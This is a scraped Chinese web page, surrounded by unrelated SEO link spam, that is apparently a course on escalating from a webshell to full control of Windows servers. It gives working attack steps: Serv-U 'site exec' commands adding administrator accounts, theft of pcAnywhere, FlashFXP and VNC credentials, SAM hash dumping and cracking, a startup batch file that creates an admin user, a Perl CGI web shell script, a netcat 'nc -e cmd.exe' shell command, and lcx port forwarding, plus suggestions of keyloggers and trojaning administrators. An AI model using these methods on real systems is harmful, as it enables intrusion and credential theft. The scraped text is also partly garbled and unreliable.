当前位置: 首页 > news >正文

php学校网站源码广州建网站兴田德润信任

php学校网站源码,广州建网站兴田德润信任,施工企业降本增效的方法和措施,网站直接访问第一课 提权概述测试环境#xff1a;Windows xp 系统1 了解什么是提权#xff1f;通常是 匿名权限#xff08;ASP#xff09; ASP.NET USER权限入侵获得webshell并不完美#xff0c;完美的是获得服务器的权限。第一 如果服务器上有装了pcanywhere服务端#xff0c;管理…第一课 提权概述测试环境Windows xp 系统1 了解什么是提权通常是 匿名权限ASP   ASP.NET USER权限入侵获得webshell并不完美完美的是获得服务器的权限。第一 如果服务器上有装了pcanywhere服务端管理员为了管理方便 123 123 IP也给了我们方便到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里那么就会用到ftp服务器使用最多的就是servu   IIS那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写 好开始把首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载 下来然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖 启动servu添加了一个用户设置为系统管理员目录C:/具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。用我新建的用户和密码连接 好的还是连上了 ftp ftpopen ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftpcd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftpquote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 第三 就是先检查有什么系统服务或者随系统启动自动启动的程序和管理员经常使用的软件比如诺顿VAdministrator金山瑞星,WinRAR甚至QQ之类的是否可以写如果可以就修改其程序 绑定一个批处理或者VBS然后还是等待服务器重启。 第四 查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码可能会有所 收获等等。 第五 使用Flashfxp也能提升权限但是成功率就看你自己的运气了 首先找到FlashFXP文件夹打开(编辑)Sites. dat这个文件这是什么东西密码和用户名 而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中替换我本地的相应文件。然后会发现 打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦嘻嘻 唔不对啊是来提升权限的啊晕接着来别半途而废。 大家看看对方管理员的这站点管理器有用户名和密码密码是星号的。经过用xp星号密码 查看器查看然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示 然后最终把这个网站管理员的密码从这堆东西中找 出来。那么下一步就可以链接这些新的服务器啦 经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地 还原对方管理员的各个站点的密码。 **************************************************************************** 第六WIN2KIIS5.0默认情况下应用程序保护选项是中共用的这时IIS加载isapi是用的 iwam_computername用户身份执行。 但默认情况下WIN2KIIS5对于一些特殊isapi又要以system身份加载。win2kiis5 、 win2kiis5sp1、win2kiis5sp2都是简单的判断isapi的文件名并且没有做目录限制 以SYSTEM权限加载的isapi有 1、 idq.dll 2、 httpext.dll 3、 httpodbc.dll 4、 ssinc.dll 5、 msw3prt.dll 6、 author.dll 7、 admin.dll 8、 shtml.dll 9、 sspifilt.dll 10、compfilt.dll 11、pwsdata.dll 12、md5filt.dll 13、fpexedll.dll 所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题就是/、/只识别了一个 /所以如果请求里面使用/就会错误的处理包含文件路径有可能泄露东西或者出现权限 漏洞这种漏洞很多别的地方 php、asp等也还存在。 加载这些isapi不是单以文件名做依据了而是加了路径应该是修正了此问题。 一般默认情况下是 1、 idq.dll d:/winnt/system32/idq.dll 2、 httpext.dll d:/winnt/system32/inetsrv/httpext.dll 3、 httpodbc.dll d:/winnt/system32/inetsrv/httpodbc.dll 4、 ssinc.dll d:/winnt/system32/inrtsrv/ssinc.dll 5、 msw3prt.dll d:/winnt/system32/msw3prt.dll 6、 author.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/_vti_aut/author.dll 7、 admin.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/_vti_adm/admin.dll 8、 shtml.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/shtml.dll 9、 sspifilt.dll d:/winnt/system32/inetsrv/sspifilt.dll 10、compfilt.dll d:/winnt/system32/inetsrv/compfilt.dll 11、pwsdata.dll d:/winnt/system32/inetsrv/pwsdata.dll 12、md5filt.dll d:/winnt/system32/inetsrv/md5filt.dll 13、fpexedll.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/bin/fpexedll.dll 正常情况下这些路径都guest不能写,但如果配置不好这些路径iis user能够写了就一样可以提升权限了 可以把ISAPIHack.dll上传到IIS的可执行目录文件名可叫ssinc.dll或者admin.dll等上面列的13个文件名之一。 然后等待IIS重启加载此dll就可以获得权限了 **************************************************************************** 第七下载系统的 %windir%/repair/sam.*WinNT 4下是sam._ 而Windows 2000下是sam文件 然后用L0pht等软件进行破解只要能拿到肯花时间就一定可以破解。 **************************************************************************** 第八PipeUpAdminWindows 2000下, 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。 **************************************************************************** 第九 Serv-u Ftp Server 本地权限提升漏洞 很多主机的C:/Documents and Settings/All Users/ Documents目录以及下边几个子目录Documents没有设置权限导致可以在这个目录上传并运行Exp. 直接上传了serv-u local exploit 和nc, 并且把serv-u的本地提升权限的名字命名为su.exe 文件就放在C:/Documents and Settings/All Users/ Documents,然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。 具体命令 建立用户: serv-u.exe cmd USER xl PASS 111111 反弹shell: serv-u.exe nc.exe -l -p 99 -e cmd.exe 很不错的提权新方法第二课 serv-u服务器提权目录无修改权限serv-u 是一款常见用于搭建网站的软件但也存在不少漏洞。这点让入侵者有机会入侵。1 首先服务器必须要有安装serv-u安装2 满足条件才能成功提权获服务器权限3 使用webshell自带提权功能提权cmd /c net user hxhack$ dandan123 /add net localgroup administrators hxhack$ /add然后用建立的用户进行3389远程桌面连接。第三课 serv-u服务器提权目录有修改权限1理解ServUDaemon.ini文件的字段意思2修改ServUDaemon.ini文件3执行程序获得权限ServUDaemon.ini配置文件详解[USERhonker|1]    //用户名Passwordgn3436a2a7150feb9edf0151aec2bcbde2    //用户密码加密后的密文HomeDirc:/   //默认根目录TimeOut600 //超时时间设置MaintenanceSystem //权限Access1C:/|RWAMELCDP   //可访问的目录及权限Access2d:/|RWAMELCDP   //可访问的目录及权限Access3e:/|RWAMELCDP   //可访问的目录及权限Quote site exec net user 4567 4567 /addquote site exec net localgroup administrators 4567 /add提示200 EXEC command successful (TID33).mstscC:/Program Files/RhinoSoft.com/Serv-U/ServUAdmin.exe---------------------------------------------------------[USERhx95|1]Passwordgn3436a2a7150feb9edf0151aec2bcbde2HomeDirc:/ TimeOut600MaintenanceSystemAccess1C:/|RWAMELCDPAccess2d:/|RWAMELCDPAccess3e:/|RWAMELCDP第四课 pcanywhere提权方法测试环境Windows xp 系统Pcanywhere软件介绍这是一款老牌的计算机远程控制软件功能强大。通过pcAnywhere管理员可以用自己的计算机登录其他计算机的游戏账号大大降低丢号的风险。强烈推荐游戏工作室使用pcAnywhere的使用方法并不复杂下面将为您详细介绍稍有计算机操作经验的人都可以轻松掌握。我们把管理员的计算机称为主控端员工的计算机称为被控端。主控端和被控端需要分别安装pcAnywhere软件然后通过pcAnywhere界面管理员可以在自己的计算机上操作员工的计算机这就是pcAnywhere的基本原理。获得管理密码的方法利用工具破解*.cif文件1 个人电脑和服务器需要安装2 服务器启动第五课 FlashFXP替换文件提权测试环境Windows xp 系统提权思路利用FlashFXP替换文件漏洞可以读取管理员连接过的站点帐户密码信息思路扩展通过社会工程学猜测其他的密码同样如此借此机会扩大权限收集密码利用社会工程学进一步利用猜测。-----------FlashFXP是功能强大的FXP/FTP软件融合了一些其他优秀FTP软件的优点如像CuteFTP一样可以比较文件夹支持彩色文字显示像BpFTP支持多文件夹选择文件能够缓存文件夹像LeapFTP一样的外观界面甚至设计思路也差相仿佛。支持文件夹 (带子文件夹)的文件传送、删除支持上传、下载及第三方文件续传可以跳过指定的文件类型只传送需要的文件可以自定义不同文件类型的显示颜色可以缓存远端文件夹列表支持FTP代理及Socks 45具有避免空闲功能防止被站点踢出可以显示或隐藏“隐藏”属性的文件、文件夹支持每个站点使用被动模式等。-------------问FlashFXP中的“FXP”是什么意思  答FXP是指在两台服务之间的直线传输。也可以称为“站到站传输”Site to Site Transfers。FXP过程需要服务两台服务器均支持方可进行。它利用服务器之间的高速连接实现文件的高效传输几乎不会占用本机的带宽资源。问FlashFXP的不足。  答FlashFXP无法像CuteFTP那样实现的多窗功能CuteFTP可在一个窗口中打开多个站点。此外FlashFXP尚不支持多进程传输所有的下载和上传任务均是以单线程进行。需要下载的文件quick.datsites.datstats.dat将以上文件替换本地ftp发现连接时出现密码。这是用密码查看器查看可以破解密码。第六课 VNC密码破解提权测试环境Windows xp 系统VNC介绍VNCVirtual Network Computing虚拟网络计算最早是一套由英国剑桥大学ATT实验室在2002年开发的轻量型的远程控制计算机软件其采用了 GPL 授权条款任何人都可免费取得该软件。VNC软件主要由两个部分组成VNC server及VNC viewer。用户需先将VNC server安装在被控端的计算机上后才能在主控端执行 VNC viewer 控制被控端。 VNC server 与 VNC viewer 支持多种操作系统如 windowsLinuxMacOS 及 Unix 系列UnixSolaris等因此可将 VNC server 及 VNC viewer 分别安装在不同的操作系统中进行控制。RealVNC 的优越性还在于如果操作系统的主控端计算机没有安装 VNC viewer也可以通过一般的网络浏览器如 IE 等来控制被控端需要 Java 虚拟机的支持。VNC的运行过程整个 VNC 一般运行的工作流程如下 1 VNC 客户端通过浏览器或 VNC Viewer 连接至 VNC Server。 2 VNC Server 传送一对话窗口至客户端要求输入连接密码可能为空以及存取的 VNC Server 显示装置。 3 在客户端输入连接密码后VNC Server 验证客户端是否具有存取权限。 4 若是客户端通过 VNC Server 的验证客户端即要求 VNC Server 显示桌面环境。 5 被控端将画面显示控制权交由 VNC Server 负责。 6 VNC Server 将把被控端的桌面环境利用 VNC 通信协议送至客户端并且允许客户端控制 VNC Server 的桌面环境及输入装置。VNC提权方法利用shell读取vnc保存在注册表中的密文使用工具VNC4X破解注册表位置HKEY_LOCAL_MACHINE/SOFTWARE/RealVNC/WinVNC4/password69 45150 96177 b1243 f3153 9989 59148 9422 16十六进制转换成十进制。。。在用工具破解。第八课 替换服务提权测试环境Windows xp 系统权限情况:   通常我们入侵一个服务器都是获得了一个webshell但是只要稍微有一点经验的管理员都知道ASP运行的权限是非常底的(在这个地方是指我们的服务器的每个磁盘的分区格式必须是NTFS分区)因为只有NTFS分区才可能具有权限管理的功能。但是在很多情况下我们仍然可以遇到这样的情况服务器管理员由于各种原因并没有把服务器的各个磁盘的格式设置为NTFS而且是FAT32格式也就是说服务器没有权限的限制那么再近一步就是说 我们可以任意的控制任何一个磁盘包括可以上传文件、删除文件、替换文件那么大家一定马上可以想到在服务器的“启动”项里面是不是都是以SYSTEM权限启动的OK对了那么我们就可以-----替换服务使用工具自己的木马或者后门等(只要可以达到控制服务器的目的就可以)提权思路既然服务器的各个磁盘没有任何的权限限制那么我们就可以替换任意文件既然这样我们几乎一定等于控制了整个服务器思路扩展其实如果对方的服务器没有采用NFTS磁盘权限管理我们就可以对任何文件都具有运行的权利那么我们上传一个sniffer上去或者上传一个键盘记录上去也不是不可以更多的思路期待大家去大胆的想象~~  第九课 利用HASH破解提权测试环境Windows xp 系统使用工具SAMinside、LC5、提权思路利用SAMinside软件的抓取系统用户HASH值然后使用LC5进行破解思路扩展本次提权主要是运用在针对大型服务器集群或者是同一个管理员管理的机房利用了社会工程学的原理在里面因为一般同一个管理员管理的服务器都是同一个密码。其实还可以想象到其他很多方法比如在管理员的登陆入口写入代码抓取管理员的各种敏感信息。2、在服务器上挂马让管理员使用的PC机中马然后就可以获得非常多的管理员常用密码信息其实还有很多大家可以充分发挥想象能力提权步骤1、使用SAMinside抓取服务器HASH2、导出为txt文件3、使用LC5进行HASH破解第十课 启动项提权测试环境Windows xp 系统1 建立一个文本文本内容输入echo offnet user xixi 123456 /addnet localgroup administrators xixi /add然后改名字为add.bat2 利用webshell把建立好的add.bat放到启动项里。   只要管理员重新启动计算机后就会执行我们的add.bat文件。   这样一来就建立了一个用户第十一课 CAcls命令在提权中的使用课程主要内容利用webshell的cmd命令执行功能使用cacls命令修改服务器磁盘、文件夹或NET.EXE为最低权限提升权限。关键技术要点cacls命令详细使用方法。随着管理员的对服务器的熟悉和黑客入侵的过程越来越了解,相应的就在入侵的关键点上设置了障碍,这些障碍的投置有些比较简单,是可以被绕过的,比如管理员很喜欢作的一件事是把首页文件设置没对IUSER_用户没有写权限,用来防止被挂木马或者将NET.EXE,FTP.EXE等工具设置不给于IUSER用户使用权限,让我们无法用NET USER建帐号或FTP进行下载,我们可以利用Cacls 修改权限后再正常使用,cacls是windows自带的一个权限修改工具,它是在命令行下运行的,能很方便的修改文件或目录的权限,cacls成功的条件是要修改的文件允他的主要运行参数如下/Cacls filename [/T] [/E] [/C] [/G usererm] [/R user [...]] [/P usererm [...]] [/D user [...]]Filename显示访问控制列表(以下简称ACL)/T更改当前目录及其所有子目录中指定文件的ACL/E编辑ACL而不替换/C在出现拒绝访问错误时继续   /G Userer:perm赋予指定用户访问权限Perm代表不同级别的访问权限其值可以是R(读取)、W(写入)、C(更改写入)、F(完全控制)等。/R user撤销指定用户的访问权限注意该参数仅在与“/E”一起使用时有效。/P userperm替换指定用户的访问权限perm的含义同前但增加了“N(无)”的选项。/D user拒绝指定用户的访问假设欲修改CMD.EXE的权限 执行cacls E:/index.asp /t /e /c /g interactive:f给把CMD的完全控制权限给予了interactive组成员(IIS访问用户IUSER_机器名就在这一组中).这时通过CMD可以正常使用了要修改一个文件的权限的必要条件:要有USERS组的完全控制权限CMD权限 第十二课 Windows-2003-webshell默认权限课程主要内容详细讲解在iis默认配置和典型配置下的webshell权限包括读、写、执行权限已经扩展权限fso、运行cmd、rwirte权限等。讲解权限提升概念。关键技术要点典型配置下的webshell可使用权限提权概念。默认设置首要区别 默认在WINDOWS2003下是没有安装IIS的?默认只安装静态HTTP服务器 IIS 6.0的默认安装被设置为仅安装静态HTML页面显示所需的组件而不允许动态内容。?增强的文件访问控制   匿名帐号不再具有web服务器根目录的写权限。另外FTP用户也被相互隔离在他们自己的根目录中。这些限制有效的避免了用户向服务器文件系统的其他部分上传一些有害程序。例如攻击者可以向scripts目录上传一些有害的可执行代码并远程执行这些代码从而攻击web站点父目录被禁用   IIS 6.0中默认禁用了对父目录的访问。这样可以避免攻击者跨越web站点的目录结构访问服务器上的其他敏感文件如SAM文件等。当然也请注意由于父目录默认被禁用这可能导致一些从早期版本IIS上迁移过来的应用由于无法使用父目录而出错。坚持最小特权原则   IIS 6.0坚持一个基本安全原则--最小特权原则。也就是说HTTP.sys中所有代码都是以Local System权限执行的而所有的工作进程都是以Network Service的权限执行的。Network Service是Windows 2003中新内置的一个被严格限制的账号。另外IIS 6.0只允许管理员执行命令行工具从而避免命令行工具的恶意使用。这些设计上的改变都降低了通过潜在的漏洞攻击服务器的可能性。部分基础设计上的改变、一些简单配置的更改包括取消匿名用户向web服务器的根目录写入权限和将FTP用户的访问隔离在他们各自的主目录中都极大地提高了IIS 6.0的安全性。典型配置的权限、磁盘权限  系统盘及所有磁盘只给 Administrators 组和 SYSTEM 的完全控制权限  系统盘Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限  系统盘Documents and SettingsAll Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限  系统盘Inetpub 目录及下面所有目录、文件只给 Administrators 组和 SYSTEM 的完全控制权限  系统盘Windows/System32/cacls.exe、cmd.exe、net.exe、net1.exe 文件只给 Administrators 组和 SYSTEM 的完全控制权限2不使用默认的Web站点如果使用也要将IIS目录与系统磁盘分开IIS默认创建的Inetpub目录被删除在安装系统的盘上3每个独立的要保护的个体比如一个网站或者一个虚拟目录创建一个系统用户让这个站点在系统中具有惟一的可以设置权限的身份在典型的WEBSEHLL下对于本站具有读写修改权限目录下拥有相对的执行权限.第十三课 Windows 2003服务器默认文件夹权限课程主要内容详细讲解Windows 2003服务器默认文件夹权限重点讲解系统盘所在文件夹默认权限和iis所在文件夹权限设置。详细讲解文件夹属性中的只读、系统、隐藏属性详细讲解文件夹的权限继承、非继承、扩展权限。关键技术要点windows 2003所有系统文件夹默认权限。Windows目录的权限(1) 完全控制“完全控制”就是对目录拥有不受限制的完全访问。地位就像Administrators在所有组中的地位一样。选中了“完全控制”下面的五项属性将被自动被选中。(2) 修改“修改”则像Power users选中了“修改”下面的四项属性将被自动被选中。下面的任何一项没有被选中时“修改”条件将不再成立。(3) 读取和运行“读取和运行”就是允许读取和运行在目录下的任何文件“列出文件夹目录”和“读取”是“读取和运行”的必要条件。(4) 列出文件夹目录“列出文件夹目录”是指只能浏览该卷或目录下的子目录不能读取也不能运行。(5) 读取“读取”是能够读取该卷或目录下的数据。(6) 写入“写入”就是能往该卷或目录下写入数据。(7) 特别的权限。而“特别”则是对以上的六种权限进行了细分。3. 权限的四个特性——继承性、累加性 、优先性、交叉性三种文件和文件夹属性只读顾名思义只能读不能修改系统被隐藏保护通常不会显示隐藏隐藏不显示.系统盘权限设置c:/administrators 全部该文件夹子文件夹及文件CREATOR OWNER   全部只有子文件来及文件system 全部该文件夹子文件夹及文件IIS_WPG 创建文件/写入数据只有该文件夹IIS_WPG该文件夹子文件夹及文件遍历文件夹/运行文件列出文件夹/读取数据读取属性创建文件夹/附加数据读取权限c:/Documents and Settingsadministrators 全部该文件夹子文件夹及文件Power Users 该文件夹子文件夹及文件读取和运行列出文件夹目录读取SYSTEM全部该文件夹子文件夹及文件C:/Program Filesadministrators 全部该文件夹子文件夹及文件CREATOR OWNER全部只有子文件来及文件IIS_WPG 该文件夹子文件夹及文件读取和运行列出文件夹目录读取Power Users该文件夹子文件夹及文件修改权限SYSTEM全部该文件夹子文件夹及文件TERMINAL SERVER USER 该文件夹子文件夹及文件修改权限最后文件夹的权限继承、非继承、扩展权限第十四课 利用perl提升权限课程主要内容通过webshell询找PERL默认目录利用目录权限漏洞实现权限提升。关键技术要点:学会使用PERL的SHELL。什么是 Perl   Perl 就是 Practical Extraction and Reporting Language 的简称是一种最广泛应用于语法分析和 World Wide Web 的编程语言。它起源于 awk、C、sh 和 sed 语言然而它的应用开发远比其他任何一种面向对象编程语言更加容易。   Perl 语言由 Larry Wall 创建最初作为一种实用解释语言。其主要功能最初是用于分析基于文本的数据和生成这些数据的统计或结果。随着 Internet 的普及推广我们已经感受到 Perl 在 CGI 编程和处理格式数据上的强大功能。由于 Perl 对 process、文档和文字有很强的处理、变换能力因此凡是有关快速原型设计、系统工具、软件工具、系统管理、资料库连结、图像程式设计、网络连结和 WWW 程式设计等之类的任务都特别适合用 Perl 来完成c:/prel有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中#!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, Content-type: text/html/r/n/r/n, 27);$_ $ENV{QUERY_STRING};s/%20/ /ig;s/%2fig;$execthis $_;syswrite(STDOUT, /r/n, 13);open(STDERR, STDOUT) || die Cant redirect STDERR;system($execthis);syswrite(STDOUT, /r/n/r/n, 17);close(STDERR);close(STDOUT);exit;保存为cmd.pl上传至BIN目录执行,(如果不能运行可以试试改为cgi 扩展呢把刚才的 pl文件改为 cgi文件)在IE浏览窗口中提交提交 http://anyhost//cmd.pl?dir 即可开始执行命令,请注意这个SHELL是具有ADMIN权限的,能够添加帐号并加入管理员组,书写规则是在?后加入你需要执行的命令.为什么安装PERL能导至黑客在服务器上提升权限呢?原理很简单,因为PERL在默认安装时BIN目录是具有EVERYONE的完全控制权限和CGI执行权限的,所以能执行任意命令,这是一个NTFS权限导至的提权漏洞.第十五课 端口映射解决内网提权首先在自己机子的cmd下运行lcx.exe -listen 51 3389意思是监听51端口并转发到3389端口然后在肉鸡上运行 lcx.exe路径 -slave 你的IP 51 肉机IP 1433意思是 把肉机的3389端口 转发到 自己的IP 51端口上提权思路利用webshell执行lcx实现端口发。lcx.exe -slave 127.0.0.1 51 192.168.79.130 3389然后远程连接127.0.0.1输入账号密码192.168.0.100
http://www.hkea.cn/news/14448730/

相关文章:

  • 做网站换域名怎么做网站扩展
  • 网站建站服务公司电话免费行情100个软件
  • 单位网站开发合同wordpress删除分类
  • 吐鲁番市建设局网站汕头网站制作哪家好
  • 门户网站管理系统免费推广的预期效果
  • 织梦首饰网站模板wordpress插件页面好卡_
  • 网站设计个人手机怎样用网站做成软件
  • 阜阳市建设局网站如何开展外贸网络营销
  • 怎样做网站静安网站开发
  • 中海外城市建设有限公司网站深圳市住房与建设局招聘
  • 统计 网站关键字 布局快速做效果图的网站叫什么区别
  • 中国建设银行官网站u盾证书怎么找外包公司
  • 重庆网站开发培训机构可牛在线制作图片
  • 上海优化网站公司注册50万和100万
  • 产品外观工业设计公司安阳专业seo地址
  • 网站建设商城网站建设属于什么岗位
  • 网站服务器无响应是怎么回事带佣金的旅游推广平台有哪些
  • 西安网站建设公司哪有温州网站制作建设
  • 招聘销售员网站建设网络推广适合中小企业的管理软件
  • 手机设计logo软件重庆官网seo分析
  • 物业公司网站建设策划书mooc网站开发案例
  • 免费个人网站怎么建立整体vi设计方案
  • 做头像的网站空白西宁集团网站建设
  • 西安做网站魔盒沈阳市城市建设管理局网站
  • yandex推广seo推广一个月见效
  • 光泽县规划建设局网站如何提高网站收录
  • 中国建设银行员工网站wordpress 更改首页
  • 可直接进入正能量网站ui设计概念定义
  • 网站建设从零开始公众号注册
  • 手机网站制作wordpress分类信息模板下载